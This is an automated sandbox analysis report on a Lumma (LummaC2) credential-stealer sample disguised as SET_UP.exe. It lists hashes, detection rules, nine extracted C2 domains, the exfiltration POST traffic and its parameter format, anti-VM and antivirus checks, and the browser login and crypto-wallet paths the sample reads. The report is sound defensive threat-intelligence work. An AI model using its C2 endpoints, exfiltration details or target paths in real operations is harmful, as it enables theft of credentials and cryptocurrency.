
Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name: SET_UP.exe
Analysis ID: 1584813
MD5: 5b0bafdddbc54bcbc57b87dfb94d0c64
SHA1: 80f9e34f49784e7d097ea9cdf3989133a688c726
SHA256: cedea9aa30ea6ae6d36937321225d8ad2d8e2ff21412ef2254817b0da028ed71
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SET_UP.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 5B0BAFDDDBC54BCBC57B87DFB94D0C64)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "cloudewahsj.shop", "nearycrepso.shop", "noisycuttej.shop", "abruptyopsn.shop", "rabidcowse.shop", "wholersorie.shop", "glowscarrytsv.sbs"], "Build id": "hRjzG3--ELVIRA"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x531b3:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1807281482.0000000000A69000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1792533320.0000000000A37000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: SET_UP.exe PID: 7620 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T15:15:08.513880+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:09.515438+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:10.634900+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:12.133029+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:13.372746+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:14.676572+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:16.067101+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:23.991606+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:09.034284+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:10.005978+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:09.034284+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:10.005978+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:15.492390+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | TCP

AV Detection

Source: https://glowscarrytsv.sbs/api | Avira URL Cloud: Label: malware
Source: SET_UP.exe.7620.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "cloudewahsj.shop", "nearycrepso.shop", "noisycuttej.shop", "abruptyopsn.shop", "rabidcowse.shop", "wholersorie.shop", "glowscarrytsv.sbs"], "Build id": "hRjzG3--ELVIRA"}
Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp | String decryptor:
  • cloudewahsj.shop
  • rabidcowse.shop
  • noisycuttej.shop
  • tirepublicerj.shop
  • framekgirus.shop
  • wholersorie.shop
  • abruptyopsn.shop
  • nearycrepso.shop
  • glowscarrytsv.sbs
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • hRjzG3--ELVIRA
Source: SET_UP.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49753 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs:
  • tirepublicerj.shop
  • framekgirus.shop
  • cloudewahsj.shop
  • nearycrepso.shop
  • noisycuttej.shop
  • abruptyopsn.shop
  • rabidcowse.shop
  • wholersorie.shop
  • glowscarrytsv.sbs
Source: global traffic | TCP traffic: 192.168.2.4:62246 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:{49748, 49749, 49750, 49751, 49752, 49753, 49754, 49756} -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 requests to Host: glowscarrytsv.sbs, all with Connection: Keep-Alive and User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36, differing in body size and type:
  • Content-Length: 8, Content-Type: application/x-www-form-urlencoded
  • Content-Length: 80, Content-Type: application/x-www-form-urlencoded
  • Content-Length: 18140, Content-Type: multipart/form-data; boundary=TT526WWK16ZIQG
  • Content-Length: 8767, Content-Type: multipart/form-data; boundary=8KZNW321KQR41UQ
  • Content-Length: 20438, Content-Type: multipart/form-data; boundary=LH89NZCPPT358FSVRS
  • Content-Length: 916, Content-Type: multipart/form-data; boundary=RAO4YOWP
  • Content-Length: 1112, Content-Type: multipart/form-data; boundary=SZ2TPF9HTZ8ABB2DKFX
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (reported 4 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported twice)
Source: global traffic | DNS traffic detected: DNS query: glowscarrytsv.sbs
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: glowscarrytsv.sbs
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: SET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: SET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SET_UP.exeString found in binary or memory: https://www.innosetup.com/
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: SET_UP.exeString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2

              System Summary

Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_009A49C9 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 00959A76 appears 74 times
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 00966776 appears 113 times
Source: SET_UP.exe | Static PE information: invalid certificate
Source: SET_UP.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: SET_UP.exe, 00000000.00000003.1742632855.000000000306E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs SET_UP.exe
Source: SET_UP.exe, 00000000.00000002.1907056872.0000000000DA8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs SET_UP.exe
Source: SET_UP.exe, 00000000.00000000.1655032089.0000000000732000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs SET_UP.exe
Source: SET_UP.exe | Binary or memory string: OriginalFileName vs SET_UP.exe
Source: SET_UP.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00950B19 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle
Source: C:\Users\user\Desktop\SET_UP.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\SET_UP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SET_UP.exe, 00000000.00000003.1767206139.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782179637.00000000036C8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SET_UP.exe | String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: SET_UP.exe | String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: SET_UP.exe | String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
Source: SET_UP.exe | String found in binary or memory: /LoadInf=
Source: C:\Users\user\Desktop\SET_UP.exe | File read: C:\Users\user\Desktop\SET_UP.exe
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SET_UP.exe | Section loaded: profapi.dll
Source: SET_UP.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SET_UP.exe | Static file information: File size 77268426 > 1048576
Source: SET_UP.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2bfa00
Source: SET_UP.exe | Static PE information: section name: .didata
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0097ED99 push es; mov dword ptr [esp], eax | 0_2_0097EDA0
Source: C:\Users\user\Desktop\SET_UP.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SET_UP.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SET_UP.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\SET_UP.exe TID: 7724 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\SET_UP.exe TID: 7752 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\SET_UP.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906469607.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805928327.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW b
Source: SET_UP.exe, 00000000.00000002.1906469607.00000000009E7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792533320.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903506945.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1821699988.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SET_UP.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00950409 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_009509C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00951019 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00951018 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00950D79 mov eax, dword ptr fs:[00000030h]

              HIPS / PFW / Operating System Protection Evasion

Source: SET_UP.exe | String found in binary or memory: glowscarrytsv.sbs
Source: SET_UP.exe | String found in binary or memory: nearycrepso.shop
Source: SET_UP.exe | String found in binary or memory: cloudewahsj.shop
Source: SET_UP.exe | String found in binary or memory: noisycuttej.shop
Source: SET_UP.exe | String found in binary or memory: rabidcowse.shop
Source: SET_UP.exe | String found in binary or memory: framekgirus.shop
Source: SET_UP.exe | String found in binary or memory: tirepublicerj.shop
Source: SET_UP.exe | String found in binary or memory: abruptyopsn.shop
Source: SET_UP.exe | String found in binary or memory: wholersorie.shop
Source: C:\Users\user\Desktop\SET_UP.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SET_UP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: SET_UP.exe, 00000000.00000003.1821699988.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906469607.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1821699988.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\SET_UP.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7620, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
